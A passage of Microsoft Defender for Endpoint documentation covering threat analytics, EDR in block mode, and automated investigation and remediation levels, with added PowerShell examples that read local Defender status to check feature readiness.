corresponding cloud services. For example, you can query event data from healthy
sensors on workstations or domain controllers almost immediately after they are
available on Microsoft Defender for Endpoint and Microsoft Defender for Identity.
- Entity data—populates tables with information about users and devices. This data
comes from both relatively static data sources and dynamic sources, such as Active
Directory entries and event logs. To provide fresh data, tables are updated with any
new information every 15 minutes, adding rows that might not be fully populated.
Every 24 hours, data is consolidated to insert a record that contains the latest,
most comprehensive data set about each entity.

Time zone

Queries
Advanced hunting data uses the UTC (Coordinated Universal Time) timezone.

Queries should be created in UTC.

Results
Advanced hunting results are converted to the timezone set in Microsoft Defender XDR.

Related topics
Choose between guided and advanced hunting modes
Build hunting queries using guided mode
Learn the query language
Understand the schema
Microsoft Graph security API
Custom detections overview



Track and respond to emerging threats through threat analytics
Article • 02/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR


With more sophisticated adversaries and new threats emerging frequently and
prevalently, it's critical to be able to quickly:

- Assess the impact of new threats
- Review your resilience against or exposure to the threats
- Identify the actions you can take to stop or contain the threats

Threat analytics is a set of reports from expert Microsoft security researchers covering
the most relevant threats, including:

- Active threat actors and their campaigns
- Popular and new attack techniques
- Critical vulnerabilities
- Common attack surfaces
- Prevalent malware

Each report provides a detailed analysis of a threat and extensive guidance on how to
defend against that threat. It also incorporates data from your network, indicating
whether the threat is active and if you have applicable protections in place.


Required roles and permissions

The following table outlines the roles and permissions required to access Threat
Analytics. Roles defined in the table below refer to custom roles in individual portals and
are not connected to global roles in Microsoft Entra ID, even if similarly named.

One of the following roles is required for Microsoft Defender XDR:
- Threat Analytics

One of the following roles is required for Defender for Endpoint:
- Alerts and incidents data: View data - security operations
- Defender Vulnerability Management mitigations: View data - Threat and
vulnerability management

One of the following roles is required for Defender for Office 365:
- Alerts and incidents data: View-only manage alerts; Manage alerts; Organization
configuration; Audit logs; View-only audit logs; Security reader; Security admin;
View-only recipients
- Prevented email attempts: Security reader; Security admin; View-only recipients

Defender for Cloud Apps: Not available for Defender for Cloud Apps or MDI users

View the threat analytics dashboard

The threat analytics dashboard is a useful jumping-off point for getting to the reports that
are most relevant to your organization. It summarizes the threats in the following
sections:

Latest threats: Lists the most recently published threat reports, along with the
number of devices with active and resolved alerts.
High-impact threats: Lists the threats that have had the highest impact to the
organization. This section ranks threats by the number of devices that have active
alerts.
Threat summary: Shows the overall impact of tracked threats by showing the
number of threats with active and resolved alerts.

Select a threat from the dashboard to view the report for that threat.

View a threat analytics report

Each threat analytics report provides information in three sections: Overview, Analyst
report, and Mitigations.

Overview: Quickly understand the threat, assess its impact, and review defenses

The Overview section provides a preview of the detailed analyst report. It also provides
charts that highlight the impact of the threat to your organization and your exposure
through misconfigured and unpatched devices.

Overview section of a threat analytics report

Assess the impact to your organization

Each report includes charts designed to provide information about the organizational
impact of a threat:

Devices with alerts: Shows the current number of distinct devices that have been
impacted by the threat. A device is categorized as Active if there is at least one
alert associated with that threat and Resolved if all alerts associated with the threat
on the device have been resolved.
Devices with alerts over time: Shows the number of distinct devices with Active
and Resolved alerts over time. The number of resolved alerts indicates how quickly
your organization responds to alerts associated with a threat. Ideally, the chart
should be showing alerts resolved within a few days.

Review security resilience and posture

Each report includes charts that provide an overview of how resilient your organization
is against a given threat:

Security configuration status: Shows the number of devices that have applied the
recommended security settings that can help mitigate the threat. Devices are
considered Secure if they have applied all the tracked settings.
Vulnerability patching status: Shows the number of devices that have applied
security updates or patches that address vulnerabilities exploited by the threat.

Analyst report: Get expert insight from Microsoft security researchers

Go to the Analyst report section to read through the detailed expert write-up. Most
reports provide detailed descriptions of attack chains, including tactics and techniques
mapped to the MITRE ATT&CK framework, exhaustive lists of recommendations, and
powerful threat hunting guidance.

Learn more about the analyst report

Mitigations: Review list of mitigations and the status of your devices

In the Mitigations section, review the list of specific actionable recommendations that
can help you increase your organizational resilience against the threat. The list of
tracked mitigations includes:

- Security updates: Deployment of security updates or patches for vulnerabilities
- Microsoft Defender Antivirus settings
- Security intelligence version
- Cloud-delivered protection
- Potentially unwanted application (PUA) protection
- Real-time protection

Mitigation information in this section incorporates data from Microsoft Defender
Vulnerability Management, which also provides detailed drill-down information from
various links in the report.

Mitigations section of a threat analytics report

Additional report details and limitations

When using the reports, keep the following in mind:

Data is scoped based on your role-based access control (RBAC) scope. You will see
the status of devices in groups that you can access.
Charts reflect only mitigations that are tracked. Check the report overview for
additional mitigations that are not shown in the charts.
Mitigations don't guarantee complete resilience. The provided mitigations reflect
the best possible actions needed to improve resiliency.
Devices are counted as "unavailable" if they have not transmitted data to the
service.
Antivirus-related statistics are based on Microsoft Defender Antivirus settings.
Devices with third-party antivirus solutions can appear as "exposed".

Related topics
Proactively find threats with advanced hunting
Understand the analyst report section
Assess and resolve security weaknesses and exposures



The analyst report in threat analytics
Article • 02/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR


Each threat analytics report includes dynamic sections and a comprehensive written
section called the analyst report. To access this section, open the report about the
tracked threat and select the Analyst report tab.

Analyst report section of a threat analytics report

Scan the analyst report

Each section of the analyst report is designed to provide actionable information. While
reports vary, most reports include the sections described in the following table.

Report section: Description

Executive summary: Overview of the threat, including when it was first seen, its
motivations, notable events, major targets, and distinct tools and techniques. You can
use this information to further assess how to prioritize the threat in the context of
your industry, geographic location, and network.

Analysis: Technical information about the threats, including the details of an attack
and how attackers might utilize a new technique or attack surface.

MITRE ATT&CK techniques observed: How observed techniques map to the MITRE ATT&CK
attack framework.

Mitigations: Recommendations that can stop or help reduce the impact of the threat.
This section also includes mitigations that aren't tracked dynamically as part of the
threat analytics report.

Detection details: Specific and generic detections provided by Microsoft security
solutions that can surface activity or components associated with the threat.

Advanced hunting: Advanced hunting queries for proactively identifying possible threat
activity. Most queries are provided to supplement detections, especially for locating
potentially malicious components or behaviors that couldn't be dynamically
assessed to be malicious.

References: Microsoft and third-party publications referenced by analysts during the
creation of the report. Threat analytics content is based on data validated by
Microsoft researchers. Information from publicly available, third-party sources
is identified clearly as such.

Change log: The time the report was published and when significant changes were made
to the report.

Apply additional mitigations

Threat analytics dynamically tracks the status of security updates and secure
configurations. This information is available as charts and tables in the Mitigations tab.

In addition to these tracked mitigations, the analyst report also discusses mitigations
that are not dynamically monitored. Here are some examples of important mitigations
that are not dynamically tracked:

- Block emails with .lnk attachments or other suspicious file types
- Randomize local administrator passwords
- Educate end users about phishing email and other threat vectors
- Turn on specific attack surface reduction rules

While you can use the Mitigations tab to assess your security posture against a threat,
these recommendations let you take additional steps towards improving your security
posture. Carefully read all the mitigation guidance in the analyst report and apply them
whenever possible.

Understand how each threat can be detected

The analyst report also provides the detections from Microsoft Defender Antivirus and
endpoint detection and response (EDR) capabilities.

Antivirus detections
These detections are available on devices with Microsoft Defender Antivirus turned on.
When these detections occur on devices that have been onboarded to Microsoft
Defender for Endpoint, they also trigger alerts that light up the charts in the report.

Note

The analyst report also lists generic detections that can identify a wide-range of
threats, in addition to components or behaviors specific to the tracked threat.
These generic detections don't reflect in the charts.

Endpoint detection and response (EDR) alerts

EDR alerts are raised for devices onboarded to Microsoft Defender for Endpoint. These
alerts generally rely on security signals collected by the Microsoft Defender for Endpoint
sensor and other endpoint capabilities (such as antivirus, network protection, tamper
protection) that serve as powerful signal sources.

Like the list of antivirus detections, some EDR alerts are designed to generically flag
suspicious behavior that might not be associated with the tracked threat. In such cases,
the report will clearly identify the alert as "generic" and that it doesn't influence any of
the charts in the report.

Find subtle threat artifacts using advanced hunting

While detections allow you to identify and stop the tracked threat automatically, many
attack activities leave subtle traces that require additional inspection. Some attack
activities exhibit behaviors that can also be normal, so detecting them dynamically can
result in operational noise or even false positives.

Advanced hunting provides a query interface based on Kusto Query Language that
simplifies locating subtle indicators of threat activity. It also allows you to surface
contextual information and verify whether indicators are connected to a threat.

Advanced hunting queries in the analyst reports have been vetted by Microsoft analysts
and are ready for you to run in the advanced hunting query editor. You can also use
the queries to create custom detection rules that trigger alerts for future matches.

Related topics
Threat analytics overview
Proactively find threats with advanced hunting
Custom detection rules



Endpoint detection and response in block mode
Article • 01/12/2024

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows


This recommendation is primarily for devices using an active non-Microsoft antivirus
solution (with Microsoft Defender Antivirus in passive mode). There is little benefit to
enabling EDR in block mode when Microsoft Defender Antivirus is the primary antivirus
solution on devices.

What is EDR in block mode?

Endpoint detection and response (EDR) in block mode provides added protection from
malicious artifacts when Microsoft Defender Antivirus is not the primary antivirus
product and is running in passive mode.

Important

EDR in block mode cannot provide all available protection when Microsoft
Defender Antivirus real-time protection is in passive mode. Some capabilities that
depend on Microsoft Defender Antivirus to be the active antivirus solution will not
work, such as the following examples:

- Real-time protection, including on-access scanning, and scheduled scan is not
available when Microsoft Defender Antivirus is in passive mode. To learn more
about real-time protection policy settings, see Enable and configure
Microsoft Defender Antivirus always-on protection.
- Features like network protection and attack surface reduction rules and
indicators (file hash, IP address, URL, and certificates) are only available when
Microsoft Defender Antivirus is running in active mode. It is expected that
your non-Microsoft antivirus solution includes these capabilities.

EDR in block mode works behind the scenes to remediate malicious artifacts that were
detected by EDR capabilities. Such artifacts might have been missed by the primary,
non-Microsoft antivirus product. EDR in block mode allows Microsoft Defender Antivirus
to take actions on post-breach, behavioral EDR detections.

EDR in block mode is integrated with threat & vulnerability management capabilities.
Your organization's security team gets a security recommendation to turn EDR in block
mode on if it isn't already enabled.

Tip

To get the best protection, make sure to deploy Microsoft Defender for Endpoint
baselines.


What happens when something is detected?

When EDR in block mode is turned on, and a malicious artifact is detected, Defender for
Endpoint remediates that artifact. Your security operations team sees the detection
status as Blocked or Prevented in the Action center, listed as completed actions. The
following image shows an instance of unwanted software that was detected and
remediated through EDR in block mode:

Enable EDR in block mode

Important

Make sure the requirements are met before turning on EDR in block mode. Starting
with platform version 4.18.2202.X, you can now set EDR in block mode to target
specific device groups using Intune CSPs. You can continue to set EDR in block
mode tenant-wide in the Microsoft Defender portal . EDR in block mode is
primarily recommended for devices that are running Microsoft Defender Antivirus
in passive mode (a non-Microsoft antivirus solution is installed and active on the
device).

Microsoft Defender XDR

1. Go to the Microsoft Defender portal (https://security.microsoft.com/ ) and sign
in.

2. Choose Settings > Endpoints > General > Advanced features.

3. Scroll down, and then turn on Enable EDR in block mode.


Intune
To create a custom policy in Intune, see Deploy OMA-URIs to target a CSP through
Intune, and a comparison to on-premises.

For more information on the Defender CSP used for EDR in block mode, see
"Configuration/PassiveRemediation" under Defender CSP.

Requirements for EDR in block mode

The following table lists requirements for EDR in block mode:

Requirement: Details

Permissions: You must have either the Global Administrator or Security Administrator
role assigned in Microsoft Entra ID. For more information, see Basic
permissions.

Operating system: Devices must be running one of the following versions of Windows:
- Windows 11
- Windows 10 (all releases)
- Windows Server 2019 or later
- Windows Server, version 1803 or later
- Windows Server 2016 and Windows Server 2012 R2 (with the new unified client
solution)

Microsoft Defender for Endpoint: Devices must be onboarded to Defender for Endpoint.
See the following articles:
- Minimum requirements for Microsoft Defender for Endpoint
- Onboard devices and configure Microsoft Defender for Endpoint capabilities
- Onboard Windows servers to the Defender for Endpoint service
- New Windows Server 2012 R2 and 2016 functionality in the modern unified solution
(See Is EDR in block mode supported on Windows Server 2016 and Windows Server
2012 R2?)

Microsoft Defender Antivirus: Devices must have Microsoft Defender Antivirus installed
and running in either active mode or passive mode. Confirm Microsoft Defender
Antivirus is in active or passive mode.

Cloud-delivered protection: Microsoft Defender Antivirus must be configured such that
cloud-delivered protection is enabled.

Microsoft Defender Antivirus platform: Devices must be up to date. To confirm, using
PowerShell, run the Get-MpComputerStatus cmdlet as an administrator. In the
AMProductVersion line, you should see 4.18.2001.10 or above. To learn more, see
Manage Microsoft Defender Antivirus updates and apply baselines.

Microsoft Defender Antivirus engine: Devices must be up to date. To confirm, using
PowerShell, run the Get-MpComputerStatus cmdlet as an administrator. In the
AMEngineVersion line, you should see 1.1.16700.2 or above. To learn more, see
Manage Microsoft Defender Antivirus updates and apply baselines.

Important

To get the best protection value, make sure your antivirus solution is configured to
receive regular updates and essential features, and that your exclusions are
configured. EDR in block mode respects exclusions that are defined for Microsoft
Defender Antivirus, but not indicators that are defined for Microsoft Defender for
Endpoint.

See also
Endpoint detection and response (EDR) in block mode frequently asked questions
(FAQ)



Endpoint detection and response (EDR) in block mode frequently asked questions (FAQ)
FAQ

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Can I specify exclusions for EDR in block mode?

If you get a false positive, you can submit the file for analysis at the Microsoft Security
Intelligence submission site .

You can also define an exclusion for Microsoft Defender Antivirus. See Configure and
validate exclusions for Microsoft Defender Antivirus scans.

Do I need to turn EDR in block mode on if I have Microsoft Defender Antivirus
running on devices?

The primary purpose of EDR in block mode is to remediate post-breach detections that
were missed by a non-Microsoft antivirus product. There is minimal benefit in enabling
EDR in block mode when Microsoft Defender Antivirus is in active mode, because real-
time protection is expected to catch and remediate detections first. We recommend
enabling EDR in block mode on endpoints where Microsoft Defender Antivirus is
running in passive mode. EDR detections can be automatically remediated by PUA
protection or by automated investigation & remediation capabilities in block mode.

Note

Microsoft recommends enabling EDR in block mode, even when primary antivirus
software on the system is Microsoft Defender Antivirus.

Will EDR in block mode affect a user's antivirus protection?

EDR in block mode does not affect third-party antivirus protection running on users'
devices. EDR in block mode works if the primary antivirus solution misses something, or
if there is a post-breach detection. EDR in block mode works just like Microsoft
Defender Antivirus in passive mode, except that EDR in block mode also blocks and
remediates malicious artifacts or behaviors that are detected.

Why do I need to keep Microsoft Defender Antivirus up to date?

Because Microsoft Defender Antivirus detects and remediates malicious items, it's
important to keep it up to date. For EDR in block mode to be effective, it uses the latest
device learning models, behavioral detections, and heuristics. The Defender for Endpoint
stack of capabilities works in an integrated manner. To get best protection value, you
should keep Microsoft Defender Antivirus up to date. See Manage Microsoft Defender
Antivirus updates and apply baselines.

Why do we need cloud protection (MAPS) on?

Cloud protection is needed to turn on the feature on the device. Cloud protection allows
Defender for Endpoint to deliver the latest and greatest protection based on our
breadth and depth of security intelligence, along with behavioral and device learning
models.

What is the difference between active and passive mode?

For endpoints running Windows 10, Windows 11, Windows Server, version 1803 or later,
Windows Server 2019, or Windows Server 2022 when Microsoft Defender Antivirus is in
active mode, it is used as the primary antivirus on the device. When running in passive
mode, Microsoft Defender Antivirus is not the primary antivirus product. In this case,
threats are not remediated by Microsoft Defender Antivirus in real time.

Note

Microsoft Defender Antivirus can run in passive mode only when the device is
onboarded to Microsoft Defender for Endpoint.

For more information, see Microsoft Defender Antivirus compatibility.

How do I confirm Microsoft Defender Antivirus is in active or passive mode?

To confirm whether Microsoft Defender Antivirus is running in active or passive mode,
you can use Command Prompt or PowerShell on a device running Windows.

PowerShell:
1. Select the Start menu, begin typing PowerShell, and then open
Windows PowerShell in the results.
2. Type Get-MpComputerStatus.
3. In the list of results, in the AMRunningMode row, look for one of the
following values:
- Normal
- Passive Mode
To learn more, see Get-MpComputerStatus.

Command Prompt:
1. Select the Start menu, begin typing Command Prompt, and then
open Windows Command Prompt in the results.
2. Type sc query windefend.
3. In the list of results, in the STATE row, confirm that the service is
running.

How do I confirm that EDR in block mode is turned on with Microsoft Defender
Antivirus in passive mode?

You can use PowerShell to confirm that EDR in block mode is turned on with Microsoft
Defender Antivirus running in passive mode.

1. Select the Start menu, begin typing PowerShell, and then open Windows
PowerShell in the results.

2. Type Get-MpComputerStatus | select AMRunningMode.

3. Confirm that the result, EDR Block Mode, is displayed.

Tip

If Microsoft Defender Antivirus is in active mode, you will see Normal instead of EDR
Block Mode. To learn more, see Get-MpComputerStatus.
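As an added example (not from the Microsoft article and not the product's own tooling), the following PowerShell function automates the manual checks from the EDR in block mode requirements table and from this FAQ answer: it reads AMRunningMode, AMProductVersion and AMEngineVersion from Get-MpComputerStatus and the cloud-delivered protection setting from Get-MpPreference, then reports which requirements the device fails and whether block mode is already on. The function name, the output fields and the coarse OS version gate are my own; onboarding to Defender for Endpoint is not checked and must be confirmed separately.

```powershell
# Added example, not Microsoft code. Run in an elevated PowerShell session on a
# Windows device that has the Defender module (Get-MpComputerStatus,
# Get-MpPreference). Threshold versions are the ones the requirements table states.
function Test-EdrBlockModeReadiness {
    [CmdletBinding()]
    param(
        # Minimum platform and engine versions from the requirements table.
        [version]$MinimumPlatformVersion = '4.18.2001.10',
        [version]$MinimumEngineVersion   = '1.1.16700.2'
    )

    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference

    # AMRunningMode is the value the FAQ has you read by hand:
    #   "Normal"         - Microsoft Defender Antivirus is the active (primary) antivirus
    #   "Passive Mode"   - a non-Microsoft product is primary
    #   "EDR Block Mode" - passive mode with EDR in block mode already enabled
    $mode = $status.AMRunningMode

    $platformVersion = [version]$status.AMProductVersion
    $engineVersion   = [version]$status.AMEngineVersion

    # MAPSReporting 0 = cloud-delivered protection off; 1 (Basic) or 2 (Advanced) = on.
    # The article requires it on but does not mandate a level.
    $cloudProtectionOn = ($pref.MAPSReporting -ne 0)

    # Coarse OS gate (my own simplification): every version in the requirements
    # table reports 10.0 except Windows Server 2012 R2, which reports 6.3.
    $os = [System.Environment]::OSVersion.Version
    $osSupported = ($os -ge [version]'6.3')

    # One entry per row of the requirements table that can be read locally.
    $checks = [ordered]@{
        'Microsoft Defender Antivirus service running' = [bool]$status.AMServiceEnabled
        'Supported Windows version'                    = $osSupported
        'Cloud-delivered protection enabled'           = $cloudProtectionOn
        "Platform version >= $MinimumPlatformVersion"  = ($platformVersion -ge $MinimumPlatformVersion)
        "Engine version >= $MinimumEngineVersion"      = ($engineVersion -ge $MinimumEngineVersion)
    }

    # The article recommends EDR in block mode for devices in passive mode and
    # says it adds little when Microsoft Defender Antivirus is active.
    $recommendation = switch ($mode) {
        'Normal'         { 'Not needed: Microsoft Defender Antivirus is active (Normal).' }
        'EDR Block Mode' { 'Already on: AMRunningMode reports EDR Block Mode.' }
        default          { "Recommended: device reports '$mode'; turn on EDR in block mode." }
    }

    [pscustomobject]@{
        AMRunningMode      = $mode
        EdrBlockModeActive = ($mode -eq 'EDR Block Mode')
        PlatformVersion    = $platformVersion
        EngineVersion      = $engineVersion
        CloudProtectionOn  = $cloudProtectionOn
        FailedChecks       = @($checks.GetEnumerator() | Where-Object { -not $_.Value } | ForEach-Object Key)
        MeetsRequirements  = -not ($checks.Values -contains $false)
        Recommendation     = $recommendation
    }
}

# Usage: FailedChecks names the requirement rows the device does not satisfy;
# MeetsRequirements is $true only when every local check passed.
Test-EdrBlockModeReadiness | Format-List
```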

Is EDR in block mode supported on Windows Server 2016 and Windows Server 2012 R2?

If Microsoft Defender Antivirus is running in active mode or passive mode, EDR in block
mode is supported on the following versions of Windows:

Windows 11
Windows 10 (all releases)
Windows Server, version 1803 or newer
Windows Server 2022
Windows Server 2019
Windows Server 2016 and Windows Server 2012 R2 (with the new unified client
solution)

With the new unified client solution for Windows Server 2016 and Windows Server 2012
R2, you can run EDR in block mode in either passive mode or active mode.

Note

Windows Server 2016 and Windows Server 2012 R2 must be onboarded using the
instructions in Onboard Windows servers for this feature to work.

How much time does it take for EDR in block mode to be disabled?

If you choose to disable EDR in block mode, it can take up to 30 minutes for the system
to disable this capability.

See also
Endpoint detection and response in block mode
Tech Community blog: Introducing EDR in block mode: Stopping attacks in their
tracks
Behavioral blocking and containment



Overview of automated investigations
Article • 12/22/2022

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Platforms

Windows


The technology in automated investigation uses various inspection algorithms and is
based on processes that are used by security analysts. AIR capabilities are designed to
examine alerts and take immediate action to resolve breaches. AIR capabilities
significantly reduce alert volume, allowing security operations to focus on more
sophisticated threats and other high-value initiatives. All remediation actions, whether
pending or completed, are tracked in the Action center. In the Action center, pending
actions are approved (or rejected), and completed actions can be undone if needed.

This article provides an overview of AIR and includes links to next steps and additional
resources.


How the automated investigation starts

An automated investigation can start when an alert is triggered or when a security operator initiates the investigation.

Situation: An alert is triggered
What happens: In general, an automated investigation starts when an alert is triggered, and an incident is created. For example, suppose a malicious file resides on a device. When that file is detected, an alert is triggered, and an incident is created. An automated investigation process begins on the device. As other alerts are generated because of the same file on other devices, they are added to the associated incident and to the automated investigation.

Situation: An investigation is started manually
What happens: An automated investigation can be started manually by your security operations team. For example, suppose a security operator is reviewing a list of devices and notices that a device has a high risk level. The security operator can select the device in the list to open its flyout, and then select Initiate Automated Investigation.

How an automated investigation expands its scope

While an investigation is running, any other alerts generated from the device are added to an ongoing automated investigation until that investigation is completed. In addition, if the same threat is seen on other devices, those devices are added to the investigation.

If an incriminated entity is seen on another device, the automated investigation process expands its scope to include that device, and a general security playbook starts on that device. If 10 or more devices are found during this expansion process from the same entity, then that expansion action requires an approval, and is visible on the Pending actions tab.

How threats are remediated

As alerts are triggered, and an automated investigation runs, a verdict is generated for
each piece of evidence investigated. Verdicts can be:

Malicious;
Suspicious; or
No threats found.

As verdicts are reached, automated investigations can result in one or more remediation
actions. Examples of remediation actions include sending a file to quarantine, stopping a
service, removing a scheduled task, and more. To learn more, see Remediation actions.

Depending on the level of automation set for your organization, as well as other security
settings, remediation actions can occur automatically or only upon approval by your
security operations team. Additional security settings that can affect automatic
remediation include protection from potentially unwanted applications (PUA).
All remediation actions, whether pending or completed, are tracked in the Action center. If necessary, your security operations team can undo a remediation action. To learn more, see Review and approve remediation actions following an automated investigation.

Tip

Check out the new, unified investigation page in the Microsoft Defender portal. To learn more, see Unified investigation page.

Requirements for AIR

Your subscription must include Defender for Endpoint or Defender for Business.

Note

Automated investigation and response requires Microsoft Defender Antivirus to be running in passive mode or active mode. If Microsoft Defender Antivirus is disabled or uninstalled, automated investigation and response will not function correctly.

Currently, AIR only supports the following OS versions:

Windows Server 2012 R2 (Preview)
Windows Server 2016 (Preview)
Windows Server 2019
Windows Server 2022
Windows 10, version 1709 (OS Build 16299.1085 with KB4493441) or later
Windows 10, version 1803 (OS Build 17134.704 with KB4493464) or later
Windows 10, version 1803 or later
Windows 11

Note

Automated investigation and response on Windows Server 2012 R2 and Windows Server 2016 requires the Unified Agent to be installed.
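The following PowerShell is an added example, not part of the article, that checks the three requirements above on the local device: Microsoft Defender Antivirus running in active or passive mode (read from the AMRunningMode property of Get-MpComputerStatus), onboarding to Defender for Endpoint (the OnboardingState value under the Windows Advanced Threat Protection\Status registry key, plus the Sense service), and an OS build in the supported list (CurrentBuildNumber and UBR from the CurrentVersion key, compared against the builds and servicing levels listed above). The function names and the shape of the output object are the example's own choices. Run it in an elevated session on an onboarded Windows device.

```powershell
# Added example (not from the article): verify the AIR prerequisites listed above on this device.
# Requires an elevated PowerShell session on Windows with the Defender cmdlets available.

function Get-AirOsSupport {
    # Maps a Windows build to the support statement in the article's OS list.
    # 1709 (16299) and 1803 (17134) need the servicing level of KB4493441 / KB4493464;
    # anything newer is supported; Server 2012 R2 (9600) and 2016 (14393) need the unified agent.
    param([int]$Build, [int]$Ubr, [bool]$IsServer)

    if ($IsServer -and ($Build -eq 9600 -or $Build -eq 14393)) {
        return [pscustomobject]@{ Supported = $true; Note = 'Preview: requires the unified agent (see Onboard Windows servers)' }
    }
    if ($Build -eq 16299) {
        return [pscustomobject]@{ Supported = ($Ubr -ge 1085); Note = 'Windows 10, version 1709 needs OS build 16299.1085 or later' }
    }
    if ($Build -eq 17134) {
        return [pscustomobject]@{ Supported = ($Ubr -ge 704); Note = 'Windows 10, version 1803 needs OS build 17134.704 or later' }
    }
    if ($Build -gt 17134) {
        return [pscustomobject]@{ Supported = $true; Note = 'Windows 10 (later than 1803), Windows 11, or Windows Server 2019/2022' }
    }
    [pscustomobject]@{ Supported = $false; Note = "Build $Build is not in the supported OS list" }
}

function Test-AirPrerequisites {
    $av         = Get-MpComputerStatus
    $cv         = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $os         = Get-CimInstance -ClassName Win32_OperatingSystem
    $onboarding = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status' -ErrorAction SilentlyContinue
    $sense      = Get-Service -Name Sense -ErrorAction SilentlyContinue

    # AMRunningMode is 'Normal' (active), 'Passive Mode' or 'SxS Passive Mode' (another AV is primary),
    # 'EDR Block Mode' (passive mode with EDR in block mode engaged) or 'Not running'. AIR works with
    # everything except 'Not running'; a disabled or uninstalled Defender Antivirus breaks it.
    $avReady = [bool]$av.AMServiceEnabled -and ($av.AMRunningMode -ne 'Not running')

    # Win32_OperatingSystem.ProductType: 1 = workstation; 2 and 3 = domain controller / server.
    $osCheck = Get-AirOsSupport -Build ([int]$cv.CurrentBuildNumber) -Ubr ([int]$cv.UBR) -IsServer ($os.ProductType -ne 1)

    # OnboardingState = 1 and a running Sense service mean the device talks to Defender for Endpoint.
    $onboarded   = ($onboarding.OnboardingState -eq 1) -and ($sense -and $sense.Status -eq 'Running')
    $senseStatus = if ($sense) { $sense.Status.ToString() } else { 'NotInstalled' }

    [pscustomobject]@{
        AMRunningMode  = $av.AMRunningMode
        AntivirusReady = $avReady
        Onboarded      = $onboarded
        SenseService   = $senseStatus
        OSBuild        = '{0}.{1}' -f $cv.CurrentBuildNumber, $cv.UBR
        OSSupported    = $osCheck.Supported
        OSNote         = $osCheck.Note
        AirReady       = $avReady -and $onboarded -and $osCheck.Supported
    }
}

Test-AirPrerequisites | Format-List
```

AirReady is true only when all three checks pass; when it is false, the AMRunningMode and OSNote fields say which requirement is missing. A device reporting 'EDR Block Mode' is in passive mode with the block-mode feature from the previous article engaged, which is still a valid state for AIR.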

Next steps
Learn more about automation levels
See the interactive guide: Investigate and remediate threats with Microsoft
Defender for Endpoint
Configure automated investigation and remediation capabilities in Microsoft
Defender for Endpoint

See also
PUA protection
Automated investigation and response in Microsoft Defender for Office 365
Automated investigation and response in Microsoft Defender XDR

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.

Automation levels in automated
investigation and remediation
capabilities
Article • 07/31/2023

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Automated investigation and remediation (AIR) capabilities in Microsoft Defender for Business are preconfigured and aren't configurable. In Microsoft Defender for Endpoint, you can configure AIR to one of several levels of automation. Your automation level affects whether remediation actions following AIR investigations are taken automatically or only upon approval.

Full automation (recommended) means remediation actions are taken automatically on artifacts determined to be malicious. (Full automation is set by default in Defender for Business.)
Semi-automation means some remediation actions are taken automatically, but other remediation actions await approval before being taken. (See the table in Levels of automation.)
All remediation actions, whether pending or completed, are tracked in the Action Center (https://security.microsoft.com).

Tip

For best results, we recommend using full automation when you configure AIR. Data collected and analyzed over the past year shows that customers who are using full automation had 40% more high-confidence malware samples removed than customers who are using lower levels of automation. Full automation can help free up your security operations resources to focus more on your strategic initiatives.

Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

Levels of automation


Automation level: Full - remediate threats automatically (also referred to as full automation)

With full automation, remediation actions are performed automatically on entities that are considered to be malicious. All remediation actions that are taken can be viewed in the Action Center on the History tab. If necessary, a remediation action can be undone.

Full automation is recommended and is selected by default for tenants with Defender for Endpoint that were created on or after August 16, 2020, with no device groups defined yet.

Full automation is set by default in Defender for Business.

Automation level: Semi - require approval for all folders (also referred to as semi-automation)

With this level of semi-automation, approval is required for remediation actions on all files. Such pending actions can be viewed and approved in the Action Center, on the Pending tab. Pending actions time out after 7 days. If an action times out, the behavior is the same as if the action is rejected.

This level of semi-automation is selected by default for tenants that were created before August 16, 2020 with Microsoft Defender for Endpoint, with no device groups defined.

Automation level: Semi - require approval for core folders remediation (also a type of semi-automation)

With this level of semi-automation, approval is required for any remediation actions needed on files or executables that are in core folders. Core folders include operating system directories, such as the Windows directory (\windows\*).

Remediation actions can be taken automatically on files or executables that are in other (non-core) folders.

Pending actions for files or executables in core folders can be viewed and approved in the Action Center, on the Pending tab.

Actions that were taken on files or executables in other folders can be viewed in the Action Center, on the History tab.

Automation level: Semi - require approval for non-temp folders remediation (also a type of semi-automation)

With this level of semi-automation, approval is required for any remediation actions needed on files or executables that aren't in temporary folders. Temporary folders can include the following examples:

\users\*\appdata\local\temp\*
\documents and settings\*\local settings\temp\*
\documents and settings\*\local settings\temporary\*
\windows\temp\*
\users\*\downloads\*
\program files\
\program files (x86)\*
\documents and settings\*\users\*

Remediation actions can be taken automatically on files or executables that are in temporary folders.

Pending actions for files or executables that aren't in temporary folders can be viewed and approved in the Action Center, on the Pending tab.

Actions that were taken on files or executables in temporary folders can be viewed in the Action Center, on the History tab.

Automation level: No automated response (also referred to as no automation)

With no automation, automated investigation doesn't run on your organization's devices. As a result, no remediation actions are taken or pending as a result of automated investigation. However, other threat protection features, such as protection from potentially unwanted applications, can be in effect, depending on how your antivirus and next-generation protection features are configured.

Using the no automation option is not recommended, because it reduces the security posture of your organization's devices. Consider setting up your automation level to full automation (or at least semi-automation).
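The following PowerShell is an added example, not part of the article, that turns the table above into a decision function: given a file path and a device group's automation level, it reports whether a remediation action would run automatically or wait in the Action Center. The folder globs are the ones printed in the table (the "\program files\" entry is printed without a trailing wildcard; the example assumes the whole subtree was meant); the level names, function names and the sample paths are the example's own and nothing here calls the service.

```powershell
# Added example (not from the article): predict how each automation level in the table above treats
# a remediation action on a given file. Pure logic, no calls to the service; the folder globs are
# the ones listed in the table, and the level names are shorthand for the portal labels.

$CoreFolderPatterns = @('*\windows\*')          # "core folders": operating system directories

$TempFolderPatterns = @(                         # "temporary folders" as listed in the table
    '*\users\*\appdata\local\temp\*',
    '*\documents and settings\*\local settings\temp\*',
    '*\documents and settings\*\local settings\temporary\*',
    '*\windows\temp\*',
    '*\users\*\downloads\*',
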